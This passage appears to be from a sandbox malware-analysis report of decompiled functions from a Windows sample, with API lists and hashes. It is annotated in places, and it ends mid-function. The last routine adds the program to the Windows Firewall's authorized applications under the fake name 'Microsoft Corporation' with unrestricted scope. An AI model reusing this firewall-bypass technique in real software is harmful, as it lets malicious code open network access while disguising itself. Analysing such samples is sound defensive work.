                                                                                  				long _v8;
                                                                                  				void* _v12;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				_t2 =  &_a4; // 0x4050e0
                                                                                  				_v12 = CreateFileW( *_t2, 0x80000000, 1, 0, 3, 0, 0);
                                                                                  				if(_v12 != 0xffffffff) {
                                                                                  					_v8 = GetFileSize(_v12, 0);
                                                                                  					CloseHandle(_v12);
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}





                                                                                  0x0040d536
                                                                                  0x0040d54c
                                                                                  0x0040d556
                                                                                  0x0040d55d
                                                                                  0x0040d56b
                                                                                  0x0040d572
                                                                                  0x0040d572
                                                                                  0x0040d57e

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D572
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: P@
                                                                                  • API String ID: 1378416451-676759640
                                                                                  • Opcode ID: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction ID: ef73fbcfdb561ef279eb64d7b78e57dedde01b6ae7d936de3e3fbaf211c6e608
                                                                                  • Opcode Fuzzy Hash: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction Fuzzy Hash: A5F01C74A40308FBDB20DFA4DC49F9D7BB4AB08711F208294FA447B2C0D6B56A808B48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 64%
                                                                                  			E0040DE70(char* __edx, intOrPtr _a4) {
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v32;
                                                                                  				char _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				char _v56;
                                                                                  				intOrPtr _v68;
                                                                                  				char* _t23;
                                                                                  				short _t26;
                                                                                  				long _t29;
                                                                                  				short _t34;
                                                                                  				intOrPtr _t37;
                                                                                  				intOrPtr _t43;
                                                                                  				long _t47;
                                                                                  				signed int _t48;
                                                                                  				void* _t50;
                                                                                  
                                                                                  				_t40 = __edx;                                                          // 0x0040de70
                                                                                  				_t50 = (_t48 & 0xfffffff8) - 0x1c;                                     // 0x0040de76
                                                                                  				_t34 = 0;                                                              // 0x0040de7b
                                                                                  				_t43 = _a4;                                                            // 0x0040de7e
                                                                                  				_v28 = 0;                                                              // 0x0040de81
                                                                                  				do {                                                                   // 0x0040de85
                                                                                  					_t23 =  &_v32;                                                     // 0x0040de88
                                                                                  					_v32 = 0;                                                          // 0x0040de93
                                                                                  					__imp__#10( *(_t43 + 8), 0x4004667f, _t23);                        // 0x0040de9b
                                                                                  					if(_t23 == 0xffffffff) {                                           // 0x0040dea4
                                                                                  						break;                                                         // 0x00000000
                                                                                  					}                                                                  // 0x00000000
                                                                                  					_t37 = _v44;                                                       // 0x0040deaa
                                                                                  					if(_t37 != 0) {                                                    // 0x0040deb0
                                                                                  						if(_t34 == 0 || _v40 < _t37) {                                 // 0x0040deb8
                                                                                  							_v40 = _t37;                                               // 0x0040dec2
                                                                                  							_t26 = E00408EA0(_t37, _t40, _t34, _t37);                  // 0x0040dec6
                                                                                  							_t37 = _v44;                                               // 0x0040decb
                                                                                  							_t50 = _t50 + 8;                                           // 0x0040decf
                                                                                  							_t34 = _t26;                                               // 0x0040ded2
                                                                                  						}                                                              // 0x0040ded2
                                                                                  						_v30 = 0;                                                      // 0x0040ded8
                                                                                  						_v26 = 0;                                                      // 0x0040dedc
                                                                                  						_v22 = 0;                                                      // 0x0040dee0
                                                                                  						_v18 = 0;                                                      // 0x0040dee4
                                                                                  						_t29 =  *(_t43 + 8);                                           // 0x0040deee
                                                                                  						_v32 = 0;                                                      // 0x0040def1
                                                                                  						_t40 =  &_v32;                                                 // 0x0040def6
                                                                                  						_v36 = 0x10;                                                   // 0x0040df00
                                                                                  						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36);               // 0x0040df08
                                                                                  						_t47 = _t29;                                                   // 0x0040df0e
                                                                                  						if(_t47 != 0xffffffff && _t47 != 0) {                          // 0x0040df13
                                                                                  							InterlockedExchangeAdd(_t43 + 0x18, _t47);                 // 0x0040df1e
                                                                                  							_t40 =  &_v56;                                             // 0x0040df28
                                                                                  							E0040DD40(_t43, _t34, _t47, _v68,  &_v56);                 // 0x0040df31
                                                                                  							_t50 = _t50 + 0x14;                                        // 0x0040df36
                                                                                  						}                                                              // 0x0040df36
                                                                                  					}                                                                  // 0x0040df13
                                                                                  				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);            // 0x0040df45
                                                                                  				return E00408FB0(_t34);                                                // 0x0040df5f
                                                                                  			}

                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32 ref: 0040DE9B
                                                                                  • recvfrom.WS2_32 ref: 0040DF08
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DF1E
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040DF3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                  • String ID:
                                                                                  • API String ID: 3980219359-0
                                                                                  • Opcode ID: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction ID: 6c80b279ed5ca581be7c80171f6d45ff8cd2583a00b65cb27f0af65c826a2fd4
                                                                                  • Opcode Fuzzy Hash: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction Fuzzy Hash: 252181B1504301AFD304DF65D884A6BB7E9EFD4314F008A3EF859D2280E774D9488BAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 29%
                                                                                  			E0040EDD0(char _a4) {
                                                                                  				long _v4;
                                                                                  				struct _OVERLAPPED* _v8;
                                                                                  				long _v12;
                                                                                  				void* __ebx;
                                                                                  				signed int _t31;
                                                                                  				signed int _t32;
                                                                                  				signed int _t36;
                                                                                  				struct _OVERLAPPED* _t38;
                                                                                  				long _t43;
                                                                                  				char _t51;
                                                                                  				struct _OVERLAPPED* _t52;
                                                                                  				long* _t54;
                                                                                  
                                                                                  				_t54 =  &_v12;                                                                            // 0x0040edd0
                                                                                  				_t51 = _a4;                                                                               // 0x0040eddc
                                                                                  				_t52 = 0;                                                                                 // 0x0040edf3
                                                                                  				_v4 = 0;                                                                                  // 0x0040edf7
                                                                                  				_v12 = 0;                                                                                 // 0x0040edfb
                                                                                  				_v8 = 0;                                                                                  // 0x0040edff
                                                                                  				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);         // 0x0040ee03
                                                                                  				_t43 = _v12;                                                                              // 0x0040ee05
                                                                                  				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;                                            // 0x0040ee0b
                                                                                  				if(_t43 == 0) {                                                                           // 0x0040ee10
                                                                                  					return _t32;                                                                          // 0x0040ee8f
                                                                                  				}                                                                                         // 0x0040ee8f
                                                                                  				do {                                                                                      // 0x0040ee13
                                                                                  					if(_t32 == 0) {                                                                       // 0x0040ee15
                                                                                  						_t38 =  *((intOrPtr*)(_t43 + 0x260));                                             // 0x0040ee27
                                                                                  						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);                        // 0x0040ee2f
                                                                                  						if(_t38 == 0) {                                                                   // 0x0040ee37
                                                                                  							__imp__#111();                                                                // 0x0040ee39
                                                                                  							_t52 = _t38;                                                                  // 0x0040ee3f
                                                                                  						}                                                                                 // 0x0040ee3f
                                                                                  					}                                                                                     // 0x0040ee37
                                                                                  					_push(_t52);                                                                          // 0x0040ee4d
                                                                                  					E0040EBE0(_v8, _v4, _v12);                                                            // 0x0040ee4e
                                                                                  					_t54 =  &(_t54[1]);                                                                   // 0x0040ee53
                                                                                  					_t52 = 0;                                                                             // 0x0040ee69
                                                                                  					_v4 = 0;                                                                              // 0x0040ee6d
                                                                                  					_v12 = 0;                                                                             // 0x0040ee71
                                                                                  					_v8 = 0;                                                                              // 0x0040ee75
                                                                                  					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);     // 0x0040ee79
                                                                                  					_t43 = _v12;                                                                          // 0x0040ee7b
                                                                                  					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;                                        // 0x0040ee81
                                                                                  				} while (_t43 != 0);                                                                      // 0x0040ee84
                                                                                  				return _t32;                                                                              // 0x00000000
                                                                                  			}

                                                                                  APIs
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE03
                                                                                  • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040EE2F
                                                                                  • WSAGetLastError.WS2_32 ref: 0040EE39
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE79
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                  • String ID:
                                                                                  • API String ID: 2074799992-0
                                                                                  • Opcode ID: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction ID: bb54af95703917af121ac1969caf4c30c918fe6ab3e07cce6cf93c7135daf7d6
                                                                                  • Opcode Fuzzy Hash: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction Fuzzy Hash: 6D2151B15083159BC200CF55D840D5BB7E8BFCCB54F044A1EF598A3250D734EA49CBAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB08
                                                                                  • WSAGetLastError.WS2_32(?,?,0040F024), ref: 0040EB10
                                                                                  • Sleep.KERNEL32(00000001,?,?,0040F024), ref: 0040EB26
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Recv$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 3668019968-0
                                                                                  • Opcode ID: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction ID: d9337b9861168a889e2dcd888c4c975a75ea967e12d624b3d4e9d1b891e0ae49
                                                                                  • Opcode Fuzzy Hash: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction Fuzzy Hash: 99117972104301AFD710DF65EC84AEBB7ECEB88710F40092AF556D2140E6B9E94997B6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E98C
                                                                                  • WSAGetLastError.WS2_32 ref: 0040E992
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040E9A8
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E9CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Send$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 2121970615-0
                                                                                  • Opcode ID: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction ID: 07d4f8ca9de2ad22a8725cccf1b5422178c79e7604c05c206d14e21095614f42
                                                                                  • Opcode Fuzzy Hash: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction Fuzzy Hash: D3014F712483056BE6308B96DC88FDB77A8EBC8711F00882AF608D61C0D6B5E9459B69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E620(void* __esi) {
                                                                                  				// Unlinks one node from a doubly linked list owned by a context object, under
                                                                                  				// that context's critical section, but only if the node's reference count is zero.
                                                                                  				// Field offsets below are read straight from the code; the names are interpretation.
                                                                                  				intOrPtr _t13;
                                                                                  				intOrPtr _t19;
                                                                                  				struct _CRITICAL_SECTION* _t21;
                                                                                  				void* _t22;
                                                                                  				intOrPtr _t23;
                                                                                  				void* _t24;                                   // stack pointer in the decompiler's view, never assigned here
                                                                                  
                                                                                  				_t22 = __esi;                                 // node to remove (passed in ESI)
                                                                                  				_t23 =  *((intOrPtr*)(_t24 + 0xc));           // owning context, taken from the caller's stack
                                                                                  				_t21 = _t23 + 0x244;                          // context's CRITICAL_SECTION at +0x244
                                                                                  				EnterCriticalSection(_t21);
                                                                                  				if(__esi == 0) {
                                                                                  					L9:
                                                                                  					LeaveCriticalSection(_t21);
                                                                                  					return 1;                                 // removed (or nothing to remove)
                                                                                  				} else {
                                                                                  					// InterlockedExchangeAdd(p, 0) is an atomic read of the count at node+0x14
                                                                                  					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                  						_t13 =  *((intOrPtr*)(__esi + 0x38));     // next
                                                                                  						_t19 =  *((intOrPtr*)(__esi + 0x34));     // prev
                                                                                  						if(_t13 != 0) {
                                                                                  							 *((intOrPtr*)(_t13 + 0x34)) = _t19;  // next->prev = prev
                                                                                  						}
                                                                                  						if(_t19 == 0) {
                                                                                  							 *((intOrPtr*)(_t23 + 0x25c)) = _t13; // node was the head: context->head = next
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t19 + 0x38)) = _t13;  // prev->next = next
                                                                                  						}
                                                                                  						// E00408FB0 is presumably a free/release wrapper (E0040C180 uses it the same
                                                                                  						// way after CloseHandle): release the payload at +0x2c, then the node itself
                                                                                  						E00408FB0( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                  						E00408FB0(_t22);
                                                                                  						goto L9;
                                                                                  					} else {
                                                                                  						LeaveCriticalSection(_t21);
                                                                                  						return 0;                             // still referenced: left in the list
                                                                                  					}
                                                                                  				}
                                                                                  			}










                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,0040E6EC,?,?), ref: 0040E630
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E640
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E64D
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E688
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                  • String ID:
                                                                                  • API String ID: 2223660684-0
                                                                                  • Opcode ID: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction ID: abaa9db80c897440a89c5e3e6cf5373dc13695b231f21a650e9875a219e15b50
                                                                                  • Opcode Fuzzy Hash: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction Fuzzy Hash: 8E01F236242304AFC3209F32FD44A9BB3A8AF95B11B40493FE846D3641DB3AE401CB28
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040C180(intOrPtr* _a4) {
                                                                                  				// Destroys a handle-table object: closes every HANDLE it holds, tears down its
                                                                                  				// critical section and frees the array and the object. Layout read from the code:
                                                                                  				// +0 element count, +4 CRITICAL_SECTION, +0x1c pointer to the HANDLE array.
                                                                                  				intOrPtr* _v8;
                                                                                  				signed int _v12;
                                                                                  				intOrPtr* _t11;                               // declarations missing from the decompiler output
                                                                                  				intOrPtr* _t18;
                                                                                  				void* _t20;                                   // never assigned: the _a4 == 0 path returns an undefined value
                                                                                  
                                                                                  				if(_a4 != 0) {
                                                                                  					_v8 = _a4;
                                                                                  					EnterCriticalSection(_v8 + 4);
                                                                                  					_v12 = 0;
                                                                                  					while(_v12 <  *_v8) {                     // close each HANDLE in the array
                                                                                  						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					LeaveCriticalSection(_v8 + 4);
                                                                                  					DeleteCriticalSection(_v8 + 4);
                                                                                  					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  					E00408FB0( *_t18);                        // free the handle array, then the object
                                                                                  					return E00408FB0(_a4);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}







                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0040F020), ref: 0040C199
                                                                                  • CloseHandle.KERNEL32(0040F024), ref: 0040C1C8
                                                                                  • LeaveCriticalSection.KERNEL32(0040F020), ref: 0040C1D7
                                                                                  • DeleteCriticalSection.KERNEL32(0040F020), ref: 0040C1E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3102160386-0
                                                                                  • Opcode ID: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction ID: 7eb137a9147c1387d79ab9d68254bdb898acac70a3962359ff170d5c72b28224
                                                                                  • Opcode Fuzzy Hash: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction Fuzzy Hash: F8116174900208EFDB08DFA4D984A9DB775FF84309F2081A9E8066B341DB39EE80DF85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 62%
                                                                                  			E00405520(intOrPtr _a4) {
                                                                                  				// Interpretation added here, not stated by the report: the vtable slot offsets used
                                                                                  				// below line up with the legacy Windows Firewall COM interfaces (INetFwMgr ->
                                                                                  				// INetFwPolicy -> INetFwProfile -> INetFwAuthorizedApplications ->
                                                                                  				// INetFwAuthorizedApplication), with _a4 as the image path being authorized.
                                                                                  				// E004054D0(CLSID, IID) is presumably an object-creation wrapper (CoCreateInstance).
                                                                                  				intOrPtr _v8;                                 // BSTR L"Microsoft Corporation"
                                                                                  				void* _v12;                                   // authorized-applications collection
                                                                                  				void* _v16;                                   // current profile
                                                                                  				intOrPtr _v20;                                // never assigned; the cleanup test on it is decompiler residue
                                                                                  				void* _v24;                                   // authorized-application entry
                                                                                  				intOrPtr* _v28;                               // firewall manager
                                                                                  				void* _v32;                                   // local policy
                                                                                  				short _v36;                                   // VARIANT_BOOL out-parameter
                                                                                  				char _v40;                                    // scope out-parameter
                                                                                  				intOrPtr _t95;
                                                                                  				intOrPtr _t110;
                                                                                  				void* _t118;
                                                                                  				void* _t199;
                                                                                  				void* _t200;
                                                                                  
                                                                                  				_v28 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v20 = 0;
                                                                                  				while(1) {                                    // the loop body runs once; the only 'continue' is dead code
                                                                                  					_t95 = E004054D0(0x411e90, 0x411ea0);     // CLSID/IID pair stored at 0x411e90 / 0x411ea0
                                                                                  					_t200 = _t199 + 8;
                                                                                  					_v28 = _t95;
                                                                                  					if(_v28 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_push( &_v32);
                                                                                  					_push(_v28);
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {                  // slot 7: get_LocalPolicy(&_v32)
                                                                                  						_push( &_v16);
                                                                                  						_push(_v32);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))() == 0) {              // slot 7: get_CurrentProfile(&_v16)
                                                                                  							_push( &_v36);
                                                                                  							_push(_v16);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))() == 0) {          // slot 8: get_FirewallEnabled(&_v36)
                                                                                  								if(_v36 == 0xffffffff) {                                          // VARIANT_TRUE: only acts when the firewall is on
                                                                                  									_push( &_v12);
                                                                                  									_push(_v16);
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {  // slot 20: get_AuthorizedApplications(&_v12)
                                                                                  										_push( &_v24);
                                                                                  										_push(_a4);
                                                                                  										_push(_v12);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {  // slot 10: Item(_a4, &_v24) failed: no entry yet
                                                                                  											_t110 = E004054D0(0x411eb0, 0x411ec0);                    // second CLSID/IID pair: a new entry object
                                                                                  											_t199 = _t200 + 8;
                                                                                  											_v24 = _t110;
                                                                                  											if(_v24 != 0) {
                                                                                  												__imp__#2(L"Microsoft Corporation");                  // OLEAUT32 ordinal 2 = SysAllocString
                                                                                  												_v8 = _t110;                                          // receives the BSTR (decompiler shows the stale _t110)
                                                                                  												if(_v8 != 0) {
                                                                                  													_push(_v8);
                                                                                  													_push(_v24);
                                                                                  													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {          // slot 8: put_Name(BSTR)
                                                                                  														_push(_a4);
                                                                                  														_push(_v24);
                                                                                  														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {      // slot 10: put_ProcessImageFileName(_a4)
                                                                                  															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);    // slot 14: put_Scope(0) = all networks
                                                                                  															if(_t118 == 0) {
                                                                                  																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);     // slot 8: Add(entry) to the collection
                                                                                  																_t118 = 0;
                                                                                  																if(0 != 0) {                                              // dead branch
                                                                                  																	continue;
                                                                                  																}
                                                                                  																L34:                                                      // common cleanup for every path
                                                                                  																if(_v20 != 0) {
                                                                                  																	_t118 = E00408FB0(_v20);
                                                                                  																}
                                                                                  																if(_v8 != 0) {
                                                                                  																	__imp__#6(_v8);                                       // OLEAUT32 ordinal 6 = SysFreeString
                                                                                  																}
                                                                                  																if(_v24 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);    // slot 2: IUnknown::Release
                                                                                  																}
                                                                                  																if(_v12 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  																}
                                                                                  																if(_v16 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  																}
                                                                                  																if(_v32 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                  																}
                                                                                  																if(_v28 == 0) {
                                                                                  																	return _t118;
                                                                                  																} else {
                                                                                  																	return  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  																}
                                                                                  															}
                                                                                  															goto L34;
                                                                                  														}
                                                                                  														goto L34;
                                                                                  													}
                                                                                  													goto L34;
                                                                                  												}
                                                                                  												goto L34;
                                                                                  											}
                                                                                  											goto L34;
                                                                                  										}
                                                                                  										// Item() succeeded: an entry for _a4 already exists, so make sure it is enabled and unrestricted
                                                                                  										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);           // slot 17: get_Enabled(&_v36)
                                                                                  										if(_t118 == 0) {
                                                                                  											if(_v36 != 0xffffffff) {
                                                                                  												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);        // slot 18: put_Enabled(VARIANT_TRUE)
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);         // put_Scope(0)
                                                                                  											} else {
                                                                                  												_v40 = 0;
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);    // slot 13: get_Scope(&_v40)
                                                                                  												if(_t118 == 0 && _v40 != 0) {
                                                                                  													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);     // scope was narrowed: reset it to 0
                                                                                  												}
                                                                                  											}
                                                                                  										}
                                                                                  										goto L34;
                                                                                  									}
                                                                                  									goto L34;
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L34;
                                                                                  						}
                                                                                  						goto L34;
